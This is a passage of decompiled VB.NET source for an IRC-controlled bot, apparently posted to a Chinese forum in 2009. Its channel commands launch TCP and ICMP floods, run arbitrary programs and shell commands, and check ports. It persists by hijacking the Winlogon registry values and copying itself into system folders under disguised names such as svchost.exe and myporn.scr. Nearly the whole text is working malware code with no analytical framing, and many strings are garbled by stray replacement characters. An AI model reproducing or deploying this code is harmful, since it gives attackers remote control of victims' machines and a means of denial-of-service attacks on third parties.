ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "port scanning now" & ChrW(65533)))
Try
objArray4 = New Object() { 1 }
objArray3 = New Object() { 2 }
Dim client3 As New TcpClient(Conversions.ToString(NewLateBinding.LateIndexGet(Me.bla, objArray4, Nothing)), Conversions.ToInteger(NewLateBinding.LateIndexGet(Me.bla, objArray3, Nothing)))
objArray3 = New Object() { 1 }
objArray4 = New Object() { 2 }
ircbot.IRCwriter.WriteLine(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(((((("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL) & " :" & ChrW(65533)) & " " & ChrW(65533)) & ChrW(3) & ChrW(65533)) & "port" & ChrW(65533)), NewLateBinding.LateIndexGet(Me.bla, objArray3, Nothing)), "on" & ChrW(65533)), NewLateBinding.LateIndexGet(Me.bla, objArray4, Nothing)), "is open" & ChrW(65533)))
Catch exception49 As SocketException
ProjectData.SetProjectError(exception49)
Dim exception15 As SocketException = exception49
If (exception15.ErrorCode = 10061) Then
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "port is not used" & ChrW(65533)))
End If
ProjectData.ClearProjectError
End Try
Catch exception50 As Exception
ProjectData.SetProjectError(exception50)
Dim exception16 As Exception = exception50
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.EndsWith("!icmp" & ChrW(65533)) Then
Try
Dim text7 As String = ircbot.inputLine
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "ICMP flooding now" & ChrW(65533)))
Interaction.Shell(("ping -t -l 65000 -w 10000 " & ChrW(65533) & text7.Replace(" !icmp" & ChrW(65533), String.Empty)), 2, False, -1)
Catch exception51 As Exception
ProjectData.SetProjectError(exception51)
Dim exception17 As Exception = exception51
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.Contains("!tcp" & ChrW(65533)) Then
Try
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "TCP flooding now" & ChrW(65533)))
separator = New Char() { " "c }
Me.bla = ircbot.inputLine.Split(separator)
Do While True
Dim client4 As New TcpClient
objArray2 = New Object(2 - 1) {}
objArray4 = New Object(1 - 1) {}
num4 = 1
objArray4(0) = num4
objArray2(0) = RuntimeHelpers.GetObjectValue(NewLateBinding.LateIndexGet(Me.bla, objArray4, Nothing))
objArray3 = New Object(1 - 1) {}
num5 = 2
objArray3(0) = num5
objArray2(1) = RuntimeHelpers.GetObjectValue(NewLateBinding.LateIndexGet(Me.bla, objArray3, Nothing))
objArray1 = objArray2
flagArray1 = New Boolean() { True, True }
NewLateBinding.LateCall(client4, Nothing, "Connect" & ChrW(65533), objArray1, Nothing, Nothing, flagArray1, True)
If flagArray1(0) Then
objArray5 = New Object() { num4, RuntimeHelpers.GetObjectValue(objArray1(0)) }
NewLateBinding.LateIndexSetComplex(Me.bla, objArray5, Nothing, True, False)
End If
If flagArray1(1) Then
objArray6 = New Object() { num5, RuntimeHelpers.GetObjectValue(objArray1(1)) }
NewLateBinding.LateIndexSetComplex(Me.bla, objArray6, Nothing, True, False)
End If
Dim stream8 As NetworkStream = client4.GetStream
If (stream8.CanWrite And stream8.CanRead) Then
Dim buffer As Byte() = Encoding.ASCII.GetBytes(ChrW(167) & "$%/%/(assssssssdfffffffff-.m,M:" & ChrW(246) & "l" & ChrW(252) & ChrW(228) & "#op" & ChrW(252) & "#l" & ChrW(246) & ChrW(228) & "+" & ChrW(228) & ChrW(228) & ChrW(228) & "%&/($%&%$&" & ChrW(167) & "$/%$/(&&/(%&/(" & ChrW(167) & "$%&/$%&/$%&/" & ChrW(65533))
stream8.Write(buffer, 0, buffer.Length)
stream8.Read(New Byte((client4.ReceiveBufferSize + 1) - 1) {}, 0, client4.ReceiveBufferSize)
End If
Loop
Catch exception52 As Exception
ProjectData.SetProjectError(exception52)
Dim exception18 As Exception = exception52
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.EndsWith("!msgbox" & ChrW(65533)) Then
Try
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "send msgbox" & ChrW(65533)))
Interaction.MsgBox(ircbot.inputLine.Replace(" !msgbox" & ChrW(65533), String.Empty), 0, Nothing)
Catch exception53 As Exception
ProjectData.SetProjectError(exception53)
Dim exception19 As Exception = exception53
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.EndsWith("!bing" & ChrW(65533)) Then
Try
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " : " & ChrW(3) & "bong" & ChrW(65533)))
Catch exception54 As Exception
ProjectData.SetProjectError(exception54)
Dim exception20 As Exception = exception54
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.Contains("!run" & ChrW(65533)) Then
Try
separator = New Char() { " "c }
Me.bla = ircbot.inputLine.Split(separator)
objArray5 = New Object(1 - 1) {}
objArray6 = New Object(1 - 1) {}
num5 = 1
objArray6(0) = num5
objArray5(0) = RuntimeHelpers.GetObjectValue(NewLateBinding.LateIndexGet(Me.bla, objArray6, Nothing))
objArray4 = objArray5
flagArray1 = New Boolean() { True }
NewLateBinding.LateCall(Nothing, GetType(Process), "Start" & ChrW(65533), objArray4, Nothing, Nothing, flagArray1, True)
If flagArray1(0) Then
objArray3 = New Object() { num5, RuntimeHelpers.GetObjectValue(objArray4(0)) }
NewLateBinding.LateIndexSetComplex(Me.bla, objArray3, Nothing, True, False)
End If
objArray6 = New Object() { 1 }
ircbot.IRCwriter.WriteLine(Operators.ConcatenateObject(((((("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL) & " :" & ChrW(65533)) & " " & ChrW(65533)) & ChrW(3) & ChrW(65533)) & "executed" & ChrW(65533)), NewLateBinding.LateIndexGet(Me.bla, objArray6, Nothing)))
Catch exception55 As Exception
ProjectData.SetProjectError(exception55)
Dim exception21 As Exception = exception55
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.Contains("!site" & ChrW(65533)) Then
Try
separator = New Char() { " "c }
Me.bla = ircbot.inputLine.Split(separator)
objArray6 = New Object() { 1 }
ircbot.IRCwriter.WriteLine(Operators.ConcatenateObject(((((("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL) & " :" & ChrW(65533)) & " " & ChrW(65533)) & ChrW(3) & ChrW(65533)) & "started website" & ChrW(65533)), NewLateBinding.LateIndexGet(Me.bla, objArray6, Nothing)))
Dim process1 As New Process
objArray6 = New Object() { 1 }
Process.Start("IExplore.exe" & ChrW(65533), Conversions.ToString(NewLateBinding.LateIndexGet(Me.bla, objArray6, Nothing)))
Catch exception56 As Exception
ProjectData.SetProjectError(exception56)
Dim exception22 As Exception = exception56
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
If ircbot.inputLine.Contains("!shell" & ChrW(65533)) Then
Try
separator = New Char() { " "c }
Me.bla = ircbot.inputLine.Split(separator)
objArray6 = New Object() { 1 }
ircbot.IRCwriter.WriteLine(Operators.ConcatenateObject(((((("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL) & " :" & ChrW(65533)) & " " & ChrW(65533)) & ChrW(3) & ChrW(65533)) & "executed" & ChrW(65533)), NewLateBinding.LateIndexGet(Me.bla, objArray6, Nothing)))
objArray6 = New Object() { 1 }
Interaction.Shell(Conversions.ToString(NewLateBinding.LateIndexGet(Me.bla, objArray6, Nothing)), 2, False, -1)
Catch exception57 As Exception
ProjectData.SetProjectError(exception57)
Dim exception23 As Exception = exception57
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & writer1.ToString))
ircbot.IRCwriter.Flush
ProjectData.ClearProjectError
End Try
End If
MyProject.Computer.get_Registry.SetValue("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" & ChrW(65533), "Shell" & ChrW(65533), "explorer.exe, C:\windows\system32\drivers\svchost.exe" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" & ChrW(65533), "UIHost" & ChrW(65533), "logonui.exe, C:\WINDOWS\system32\dllcache\recycled.exe" & ChrW(65533))
MyProject.Computer.get_Registry.SetValue("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" & ChrW(65533), "Userinit" & ChrW(65533), ("C:\WINDOWS\SYSTEM32\Userinit.exe," & ChrW(65533) & Path.GetTempPath & "win_update.exe" & ChrW(65533)))
Try
File.Copy(Application.ExecutablePath, "C:\WINDOWS\system32\dllcache\recycled.exe" & ChrW(65533))
File.Copy(Application.ExecutablePath, "C:\WINDOWS\system32\dllcache\myporn.scr" & ChrW(65533))
File.Copy(Application.ExecutablePath, "C:\WINDOWS\system32\dllcache\doc.pif" & ChrW(65533))
File.Copy(Application.ExecutablePath, "C:\windows\system32\drivers\svchost.exe" & ChrW(65533))
Continue While
Catch exception58 As Exception
ProjectData.SetProjectError(exception58)
ProjectData.ClearProjectError
Continue While
End Try
Try
Continue While
Catch exception59 As Exception
ProjectData.SetProjectError(exception59)
ProjectData.ClearProjectError
Continue While
End Try
Loop
ircbot.IRCwriter.Close
ircbot.irc.Close
Loop
Catch exception60 As Exception
ProjectData.SetProjectError(exception60)
Dim exception24 As Exception = exception60
ircbot.IRCwriter.WriteLine(("PRIVMSG " & ChrW(65533) & ircbot.CHANNEL & " :" & ChrW(3) & "7 error : " & ChrW(65533) & exception24.ToString))
ircbot.IRCwriter.Flush
Thread.Sleep(2000)
ircbot.Main(New String(0 - 1) {})
ProjectData.ClearProjectError
End Try
goto Label_1708
[ 本帖最后由 IllusionWing 于 2009-11-26 23:31 编辑 ] |